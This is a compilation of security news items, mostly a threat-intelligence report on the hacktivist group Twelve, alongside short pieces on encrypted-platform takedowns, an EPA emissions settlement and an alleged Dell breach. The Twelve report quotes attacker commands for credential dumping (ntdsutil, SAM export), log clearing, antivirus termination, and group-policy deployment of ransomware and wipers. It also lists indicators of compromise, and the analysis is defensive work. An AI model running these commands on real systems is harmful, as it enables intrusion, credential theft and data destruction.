In an interesting counterpoint to Discord’s new scheme, Interpol has taken down Ghost, an end-to-end-encrypted communications platform widely used for organized crime. It seems that Ghost was designed and marketed specifically for criminal use, but one has to ask the question about whether Discord will also face repercussions for the move to strong encryption.

Bits and Bytes

The folks at Cyber Security Associates have the scoop on doing a Patch Diff on a vulnerability fixed in a recent Windows Patch Tuesday. The short explanation is that incoming calls to the driver weren’t checked for whether they originated in the kernel or in userspace.

And finally, there’s a real mystery on the Internet. GreyNoise describes Noise Storms of spoofed packets flooding the Internet. These seem to be malicious, coming in waves since January 2020. The inclusion of the string LOVE in recent packets suggests the name LOVE Storm. GreyNoise has made packet captures available, if any of our readers feel like joining in on the sleuthing to figure out what these packets are up to.

hackaday.com/2024/09/20/this-w…

In the spring of 2024, posts with real people’s personal data began appearing on the -=TWELVE=- Telegram channel. Soon it was blocked for falling foul of the Telegram terms of service. The group stayed off the radar for several months, but as we investigated a late June 2024 attack, we found that it employed techniques identical to those of Twelve and relied on C2 servers linked to the threat actor. We are therefore confident that the group is still active and will probably soon resurface. This article uses the Unified Kill Chain methodology to analyze the attackers’ actions.

About Twelve

The group was formed in April 2023 in the context of the Russian-Ukrainian conflict and has attacked Russian government organizations ever since.

The threat actor specializes in encrypting and then deleting victims’ data, which seriously complicates efforts to recover the IT environment. This suggests that their main goal is inflicting as much damage as possible. When attacking, the group aims to reach critical infrastructure, but they do not always succeed. In addition, Twelve exfiltrates sensitive information from its victims’ systems and posts it on its Telegram channel.

Interestingly, Twelve shares infrastructure, utilities and techniques (TTPs) with the DARKSTAR ransomware group, formerly known as Shadow or COMET, which suggests that the two belong to the same syndicate or activity cluster. At the same time, whereas Twelve’s actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern. This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats.

Unified Kill Chain: In

The In stage in terms of the Unified Kill Chain refers to the initial phases of a cyberattack aimed at gaining access to the target organization’s LAN. These phases include a range of tactical actions: from external reconnaissance to assuming control of the systems inside the protected network.

Reconnaissance

While we do not know the exact reconnaissance techniques the threat actor uses, we suspect that they scan IP address ranges across Russia based on geotags and try to identify VPN servers and applications accessible from the internet that could be used as entry points into a target organization’s or a contractor’s infrastructure.

Resource Development

As we analyzed the cyberattacks, we found that the threat actor relied exclusively on well-known and freely available tools. The tools frequently used by the group include Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.

Initial Access and Delivery

In most of the attacks we are aware of, the adversary gained initial access to victims’ infrastructure through valid local or domain accounts, VPN or SSH certificates. After gaining access to the victim’s infrastructure, the attackers used the Remote Desktop Protocol (RDP) to move laterally.

Most times, the attackers penetrated the target infrastructure via some of the victim’s contractors. To do this, they gained access to the contractor’s infrastructure and then used its certificate to connect to its customer’s VPN. Having obtained access to that, the adversary can connect to the customer’s systems via the Remote Desktop Protocol (RDP) and then penetrate the customer’s infrastructure.

Exploitation

Web shells

As we analyzed the web servers compromised by the attackers, we discovered a large number of web shells. The paths where these were found looked as follows.
/home/bitrix/ext_www/[REDACTED]/assets/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/admin/
All the web shells were written in PHP and bore random names:
F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php,
a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php,
82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php
They could serve various purposes: some executed arbitrary commands, others moved files, and still others, created and sent email. Below are two examples of single-line web shells for moving files.

Examples of web shells for moving files

It is worth noting that most of the web shells used by threat actors are publicly available tools that can be found in publicly available sources. Here are two examples:

• https://github[.]com/stefanpejcic/wordpress-malware;
• https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.

We use the example of a remailer (script for sending email) to examine how the web shells function.

Example of a remailer script used by the threat actor

The attackers used this PHP script to send email messages. It starts by checking for requisite data, such as the recipient’s address, subject and message body inside a POST request. If any of the key data is missing, the script reports an error and quits. After successfully checking and preparing email components, it uses the PHP mail() function to send the email.

FaceFish backdoor

An incident we investigated involved the FaceFish backdoor, loaded with the help of a web shell installed on a VMware vCenter server by exploiting the CVE-2021-21972 and CVE-2021-22005 vulnerabilities in the vSphere virtualization platform. The former vulnerability can be found in the platform’s client and allows remote code execution, while the latter is an arbitrary file upload vulnerability in the server.

Like most of the web shells used by the group, this one is publicly available.
https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux
It was located at the following path in the infected system:
/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp
Once started, FaceFish saves a libs.so shared library in the system, injects it into the sshd process with the ld.so.preload method and restarts the SSH service.

Example of FaceFish output

Persistence

To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects. Below is a list of the PowerShell commands they ran.
Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS'
Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management'
Add-DomainGroupMember -Identity [REDACTED] -Members "EXCHANGE WINDOWS PERMISSIONS"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "users"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "userasdasdasds"
Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
The attackers also added domain accounts and user groups with the net.exe system utility.
net user [REDACTED] engineers /domain /add
net group [REDACTED] engineers /domain /add
net group engineers [REDACTED] /domain /add
net group engineers 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group 'engineers' 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group engineers /domain
net group users /domain
net group "Domain Administrators" [REDACTED] /add /domain
Furthermore, they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain.

Defense Evasion

To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services.
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
They also used a range of techniques to hide the traces of their activity. In particular, they cleared event logs with the wevtutil.exe system utility in various command shell variants.
powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}

C:\Windows\system32\cmd.EXE" /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO
wevtutil.exe cl "%1
In addition, the attackers used a script that cleared the RDP connection history to remove the traces of their RDP usage, recent documents and list of executed files.
@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib -s -h %userprofile%\documents\Default.rdp
del %userprofile%\documents\Default.rdp
del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations
reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /va /f

Command and Control

In one of the group’s attacks, we discovered traces of the Cobalt Strike framework, which the attackers used to contact their C2 and distribute malicious payloads. We found the tool at the following path:
\users\{username}\pictures\photos_delo\loop.exe
The adversary also used the curl and wget system utilities to deliver various tools to compromised hosts.
wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Unified Kill Chain: Through

The Through stage in terms of the Unified Cyber​ Kill Chain refers to adversary actions within a previously compromised target network aimed at gaining access to further systems and data that the attacker needs to achieve their goals. This stage involves a series of steps designed to propagate across the network and access critical assets.

Pivoting

The adversary used ngrok to tunnel traffic. They installed that utility immediately after connecting to the system, and set port 3389 (standard RDP port) in the configuration file. After that, all illegitimate connections to the system via RDP were made through ngrok. The attackers attached the utility to a service named “svchost” with the following command:
C:\ProgramData\svchost\svchost.exe service run --config
C:\ProgramData\svchost\svchost.yml

C:\ProgramData\svchost\ was a directory created by the attackers. The svchost.exe file is ngrok itself, while svchost.yml serves as its configuration file. In addition to the port number, it contains an authorization token, which looks as follows: 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt**********. Tokens differ between samples.

The ::::%16777216 value in the Source Network Address field, in the RDP event log indicates that the attackers initiated their connections via ngrok.

Discovery

The adversary used Advanced IP Scanner, BloodHound and adPEAS to reconnoiter the LAN and domain infrastructure, and to investigate the relationships between domains. Advanced IP Scanner can quickly identify all devices on a given network. BloodHound is used to analyze and visualize users and systems the domain trusts, and to identify paths of least resistance for privilege escalation. adPEAS is used to attack Active Directory, detect configuration flaws and identify ways to escalate domain privileges. Combined, these tools allow attackers to effectively probe and exploit victims’ LANs.

In addition, the group used PowerView module cmdlets to discover domain user accounts.
Get-DomainObject users
Get-ADUsers users
Get-ADUser users
Get-ADUser -Filter * -SearchBase "[REDACTED OU]"
Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name
The group used PowerShell to gain domain groups data.
Get-ADGroup
Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "engineers"
Get-DomainGroupMember engineers
Get-DomainGroupMember skzi

Privilege Escalation

To escalate privileges, the adversary primarily used the legitimate credentials of users with administrative access privileges.

In addition, they used the PowerView module to modify the attributes of new accounts they set up to achieve their goals:
Add-DomainObjectAcl -Rights 'All'
The -Rights ‘All’ parameter grants the account full access to the specified object. This may include permission to read, write, create, delete and perform various operations on the object.

Example of permissions granted with PowerView to an account of interest to the attackers

Execution

Scripts and commands

The adversary used system interpreters and publicly available tools, as well as self-written .bat and PowerShell scripts, to perform various actions in the system.

Below are some examples of attack scripts we discovered:
gpo.ps1
Sophos_kill_local.ps1
Logon.bat
CleanRDPHistory.bat
c:\intel\GPO.bat
\\netlogon\logon.bat
c:\intel\test.ps1
\\netlogon\u.bat
\SYSVOL\domain\scripts\outlookconf2003.ps1
The list of commands run by the adversary as recorded in the PowerShell log indicates that they started active PowerShell sessions on the hosts they attacked, and also gives one an idea of the operator’s level of competence.

See below for a list of commands that the attackers executed in an attempt to import the PowerView module.
impot .\PowerView.ps1
import .\PowerView.ps1
Import-Module .\PowerView.ps1
cd C:\Users\Public\Documents
Import-Module .\PowerView.ps1
Set-ExecutionPolicy bypass
Import-Module .\PowerView.ps1

Sophos_kill_local.ps1

A script we detected attempts to terminate Sophos processes on the computer and writes the results to local and remote log files.
$LogTime = Get-Date -Format "MM-dd-yyyy_hh-mm-ss"
$path = "C:\Program Files (x86)\Sophos\Logs\"
$pcname = $env:computername
$Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter "ExecutablePath LIKE '%Sophos%'"
foreach ($process in $processes) {
$ProcessName = $process.name
$returnval = $process.terminate()
$processid = $process.handle
if($returnval.returnvalue -eq 0) {
$LogFile1 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Success-Terminated"+".txt"
$LogFile11 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Success-Terminated"+".txt"
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile1 -Append -Force
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile11 -Append -Force
} else {
$LogFile2 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Sophos Not-Terminated"+".txt"
$LogFile22 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Sophos Not-Terminated"+".txt"
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile2 -Append -Force
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile22 -Append -Force
}
}

Using the Task Scheduler

To perform all the ultimate destructive actions, such as starting the ransomware and wipers, the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time.

powershell
.exe

\\[DOMAIN]\netlogon\wiper
.exe

/c
\\[DOMAIN]\netlogon\twelve
.exe -pass ***");

 Copy-Item

 -Destination

Credential Access

The adversary used mimikatz to obtain user credentials. They saved the utility file under the name calculator.exe to disguise its real purpose. However, they did not bother to change the utility’s default icon. The attackers used mimikatz to set up a dump of local credentials from the memory of the lsass.exe process.

Screenshot of calculator.exe running

We found artifacts indicating that mimikatz was used on compromised hosts, both in the form of an executable file and a PowerShell script.
C:\Users\[User]\Desktop\x64\mimikatz.exe
C:\Users\[User]\Desktop\CrackMapExecWin_v2.2\hosted\Invoke-Mimikatz.ps1
C:\[Redacted]\x64\mimidrv.sys
In addition to dumping lsass.exe with mimikatz, the adversary obtained local credentials by dumping the SYSTEM, SAM and SECURITY registry branches with the reg.exe system utility and saved these to the Downloads folder for subsequent archiving and exfiltration.
C:\Users\[USER]\Downloads\SYSTEM
C:\Users\[USER]\Downloads\SAM
C:\Users\[USER]\Downloads\SECURITY
The attackers also tried to gain access to domain credentials. To do this, they used the ntdsutil.exe system utility to dump ntds.dit.

The command that dumps ntds.dit is shown below:
$system32\ntdsutil.exe",""$system32\ntdsutil.exe" "ac i ntds" ifm "create full
c:\temp" q q
To extract additional credentials from the system, the attackers then used the console version of XenArmor’s All-In-One Password Recovery Pro utility, which can extract most of a user’s credentials from registry hives.

The command to collect data with All-In-One Password Recovery Pro is shown below:
c:\programdata\update\xenallpasswordpro.exe" -a
"c:\programdata\update\report.html"
In the screenshot below, you can see an example of running this utility with the parameters that the attackers used, and a list of data that it collects when configured like that.

Lateral Movement

To move within the victim’s infrastructure, the adversary used local and domain credentials obtained in earlier phases of the attack.

In most cases, they connected to new devices on the victim’s network via the Remote Desktop Protocol (RDP) by using the mstsc.exe executable file. They would occasionally use PsExec to move across the network via SMB and use the Enter-PSSession command to start an interactive session with remote computers on the network, a PowerShell feature for managing and running commands on remote systems with the help of PowerShell Remoting.
Enter-PSSession -ComputerName [COMPUTER 1]
Enter-PSSession -ComputerName [COMPUTER 2]
Enter-PSSession -ComputerName [COMPUTER 3]
Enter-PSSession sets up a temporary interactive session between the local and remote systems, allowing the adversary to run PowerShell commands directly on remote machines as if running them locally. The communication process typically uses the WS-Management protocol running on top of HTTP or HTTPS.

Unified Kill Chain: Out

The Exit stage in terms of the Unified Kill Chain describes the adversary’s concluding actions after successfully infiltrating the target network and gaining access to all systems and data they are looking to access. This stage focuses on achieving the ultimate goals of the attack, which may include data theft, sabotage or other actions that compromise the confidentiality, integrity and availability (CIA) of the victim’s information assets.

Collection

The adversary collected substantial amounts of sensitive information about their victims: financial documents, technical drawings, corporate email, and so on. They used 7z to archive data they collected and forwarded the data via cloud sharing services.

Also during their attacks, the adversary archived and exfiltrated the Telegram data folder (tdata).
C:\Users\[User]\AppData\Roaming\Telegram Desktop\tdata\tdata.7z
This folder contains cached media files (images, videos, audio), messages, stickers and documents the user has sent or received via Telegram. The data can be used for quick access without having to download files again from the servers. The tdata folder also contains session files that allow the application to automatically connect to the account without the user having to reenter their login and password.

An adversary who gains access to the folder can extract private messages, media files and documents, which results in the leakage of sensitive personal or commercial information. The adversary can leverage session files and encryption keys to bypass authentication when signing in to a Telegram account, to read chats and to impersonate the victim when sending messages.

Exfiltration

The adversary uploaded archives containing data they were interested in to dropmefiles.net/ via a browser. We learned that DropMeFiles was the file sharing service they used when we found a page header that read, “Завантаження вдалося! – dropmefiles.net” (“Upload successful!” – dropmefiles.net) in the browser cache in the aftermath of an attack.

Impact

Ransomware

The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data.

Kaspersky Threat Attribution Engine attribution

We detected ransomware files at the following paths:

• \ProgramData\;
• \\netlogon\.

The following file names featured in known incidents involving LockBit 3.0 ransomware.

• twelve.exe;
• 1.exe;
• 12.exe;
• enc.exe;
• betta.exe;
• sed.exe;
• svo.exe.

Below is a detonation graph for the ransomware, built by Kaspersky Cloud Sandbox. It displays file execution and suspicious events that occur in the process. As you can see from the graph, the ransomware is quite noisy and generates a lot of events that give away its activity.

Detonation graph for the ransomware used by Twelve

As previously mentioned under Execution, the ransomware leverages group policies to spread across its victims’ infrastructures. The attackers used PowerShell to move the ransomware file to the netlogon network share and then ran a script to modify group policies.
powershell.exe -ex bypass -f C:\Users\Public\gpo.ps1
After updating the policies, they set up scheduled tasks on all domain computers to copy and run the ransomware.

First, the ransomware was moved from the netlogon network share to the local ProgramData directory by the Copywiper task as follows:
powershell.exe Copy-Item `\\[DOMAIN]\netlogon\twelve.exe` -Destination `C:\ProgramData`
After this, they started the ransomware from a local folder or network share via the CLI, specifying a unique password as the -pass argument:
cmd.exe` /c c:\programdata\twelve.exe -pass ************

Adversary action pattern

The ransomware algorithm depends on the built-in configuration file. The table below shows the configuration of the Trojan in question, identical across all samples we found.

The configuration file also contains a list of directories where encryption should be skipped.

It also contains a list of specific files that should not be encrypted.

Finally, the ransomware does not encrypt files with the following name extensions:

Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files. The names of processes to be terminated are listed below.

The ransomware also terminates the following services:

Interestingly, the configuration for creating a ransom note lacks any contacts or ways of reaching out to the attackers. The final note consists of just the group logo.

We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files. We discovered samples of that ransomware at the following paths:

As you can see from the screenshot below, the Kaspersky Threat Attribution Engine detects that one of these samples bears 60% similarity to Chaos.

Result of the Kaspersky Threat Attribution Engine file attribution

At the time we discovered the samples, it was unclear who was behind the incidents in which they were used. However, static analysis showed that the code contained characteristic lines linking the samples to the Twelve group.

Result of the static analysis of Chaos-based ransomware

Wipers

In addition to the ransomware, the adversary used wipers to destroy their victims’ infrastructures. They typically ran the wipers after encrypting files.

The wiper file we found had been compiled from publicly available source code. The wiper rewrites the master boot record (MBR) on connected drives so when the victim next turns on the device, the “From Iran with love – Shamoon” message appears on the screen, and the operating system will not load.

String written to the MBR

The file then recursively goes through each directory, except for Windows and System Volume Information, on all mounted drives, and does the following for each file:

• Overwrite the file contents with randomly generated bytes;
• Overwrite file metadata: reset size and set random created/modified/opened dates;
• Assign a random name to the file and delete it.

When done, the malicious file deletes itself and shuts down the system.

As we conducted our dynamic and static analyses, we concluded that the wiper version was identical to the publicly available one.

Wiper detonation graph in Kaspersky Cloud SandBox

Result of the wiper static analysis

Also while researching the attacks by Twelve, we discovered another version of the wiper. The sample was identical to Shamoon, except for a number of specifically renamed functions.

Renamed Shamoon-based wiper features

While investigating attacks by the group, we found wiper files at the following paths:

• \Desktop\;
• \ProgramData\;
• \\netlogon\.

The following file names have featured in known incidents involving the wiper:

• intel.exe;
• mail.exe;
• wiper.exe.

The wiper’s spread pattern across a victim’s infrastructure is almost no different from that of the ransomware. The adversary uses PowerShell to copy the wiper file to the netlogon network share and then runs a script that modifies group policies and creates scheduled tasks.
powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1
The wiper file is then copied from the netlogon network share to the local ProgramData folder on all previously encrypted domain computers.
powershell.exe` Copy-Item `\\[DOMAIN]\netlogon\intel.exe` -Destination `C:\ProgramData
After this, a scheduled task starts and runs the wiper file, which destroys data on the device.
C:\ProgramData\intel.exe

Wiper spread pattern in the victim’s infrastructure

Objectives

The threat actor’s strategic goals:

• Destroy critical infrastructure and disrupt business;
• Steal sensitive data;
• Discredit victims by reporting the compromise on the attackers’ Telegram channel.

Takeaways

Twelve is mainly driven by hacktivism rather than financial gain. This shows in their modus operandi: rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery. The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit.

Our analysis also shows that the group sticks to a publicly available and familiar arsenal of malware tools, which suggests it makes none of its own. This makes it possible to detect and prevent Twelve’s attacks in due time. Failure to do so could result in the organization’s infrastructure sustaining significant damage from the threat actor.

Indicators of compromise

Web-Shells
05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679

Mimikatz
e930b05efe23891d19bc354a4209be3e

Scripts
7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde
7dfa50490afe4553fa6889bdafda7da2

Ngrok
43b3520d69dea9b0a27cce43c1608cad

Cobalt Strike
7bec3c59d412f6f394a290f95975e21f

Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5 twelve.exe
d813f5d37ab2feed9d6a2b7d4d5b0461 12.exe
646a228c774409c285c256a8faa49bde enc.exe
5c46f361090620bfdcac6afce1150fae twelve.exe
9bd78bcf75b9011f9d7a9a6e5aee5bf6 twelve.exe
f90e95b9fcab4c1b08ca06bc2c2d6e40 12.exe
39b91f5dfbbec13a3ec7cce670cf69ad sed.exe/1.exe/Screen2.exe/SVO.exe/BETTA.EXE

Wiper
4bff90a6f7bafc8e719e8cab87ab1766 intel.exe/mail.exe

File paths
C:\ProgramData\sed.exe
C:\Users\{username}\Downloads\sed.exe
C:\Users\{username}\Desktop\sed.exe
C:\programdata\svchost\svchost.exe
C:\programdata\svchost\svchost.yml
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.exe
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.yml
C:\Users\{username}\Desktop\svchost.exe
C:\Users\{username}\Desktop\svchost.yml
C:\users\{username}\pictures\photos_delo\loop.exe
C:\users\{username}\downloads\chisel_1.9.1_windows_amd64\chisel.exe
C:\Users\{username}\Documents\PowerView.ps1
C:\Users\{username}\Documents\calculator.exe
C:\Windows\qbkLIdag.exe
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL\domain\scripts\intel.exe
C:\Windows\SYSVOL\domain\scripts\outlookconf2003.ps1
C:\Windows\SYSVOL\domain\scripts\ZZZZZZ
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
\\[DOMAIN]\netlogon\12.exe
\\[DOMAIN]\netlogon\outlookconf2003.ps1
\\[DOMAIN]\netlogon\intel.exe
C:\123\12.exe
C:\ProgramData\intel.exe
C:\Users\Public\46a2209036e6282c45f8dfd3f046033d.ps1
C:\Users\Public\gpo.ps1
C:\Windows\Logs\PsExec.exe

Domains and IPs
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
195.2[.]79.195
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220

securelist.com/twelve-group-un…

Recently, the EPA and COBB Tuning have settled after the latter was sued for providing emissions control defeating equipment. As per the EPA’s settlement details document, COBB Tuning have since 2015 provided customers with the means to disable certain emission controls in cars, in addition to selling aftermarket exhaust pipes with insufficient catalytic systems. As part of the settlement, COBB Tuning will have to destroy any remaining device, delete any such features from its custom tuning software and otherwise take measures to fully comply with the Clean Air Act, in addition to paying a $2,914,000 civil fine.

The tuning of cars has come a long way from the 1960s when tweaking the carburetor air-fuel ratios was the way to get more power. These days cars not only have multiple layers of computers and sensor systems that constantly monitor and tweak the car’s systems, they also have a myriad of emission controls, ranging from permissible air-fuel ratios to catalytic converters. It’s little surprise that these systems can significantly impact the raw performance one might extract from a car’s engine, but if the exhaust of nitrogen-oxides and other pollutants is to be kept within legal limits, simply deleting these limits is not a permissible option.

COBB Tuning proclaimed that they weren’t aware of these issues, and that they never marketed these features as ’emission controls defeating’. They were however aware of issues regarding their products, which is why they announced ‘Project Green Speed’ in 2022, which supposedly would have brought COBB into compliance. Now it would seem that the EPA did find fault despite this, and COBB was forced to making adjustments.

Although perhaps not as egregious as modifying diesel trucks to ‘roll coal’, federal law has made it abundantly clear that if you really want to have fun tweaking and tuning your car without pesky environmental laws getting in the way, you could consider switching to electric drivetrains, even if they’re mind-numbingly easy to make performant compared to internal combustion engines.

hackaday.com/2024/09/20/cobb-t…

Recentemente, Dell Technologies, una delle principali aziende tecnologiche americane, è stata coinvolta in un presunto data breach. Un hacker, noto con l’alias “grep”, ha dichiarato di aver violato i sistemi di Dell, esponendo i dati di oltre 10800 dipendenti e partner interni. L’informazione è stata divulgata su un forum del dark web, sollevando preoccupazioni significative riguardo alla sicurezza informatica dell’azienda.

Secondo quanto riportato, i dati trapelati includono dettagli sensibili dei dipendenti come ID, nomi completi, stato di occupazione e ID interni. Il post sul forum, accompagnato da un campione dei dati rubati, ha rivelato che la violazione è avvenuta all’inizio di settembre 2024.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

Post rinvenuto nel Dark Web

Nonostante la mancanza di password in chiaro o altre informazioni personali identificabili, la fuga di dati rappresenta comunque una minaccia significativa per Dell. Gli hacker potrebbero utilizzare queste informazioni per attacchi di phishing o truffe telefoniche, sfruttando la vulnerabilità dei dipendenti. Inoltre, questo incidente segue un altro data breach avvenuto a maggio 2024, in cui furono compromessi i dati di 49 milioni di clienti.

Conclusioni

Questo incidente non è il primo per Dell, che già in passato ha affrontato problemi del genere. Ancora una volta, questa violazione sottolinea l’importanza di implementare misure di sicurezza robuste e di effettuare audit regolari per proteggere i dati sensibili.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Nuovo Data Breach in Dell: rivelate informazioni riservate di oltre 10mila utenti proviene da il blog della sicurezza informatica.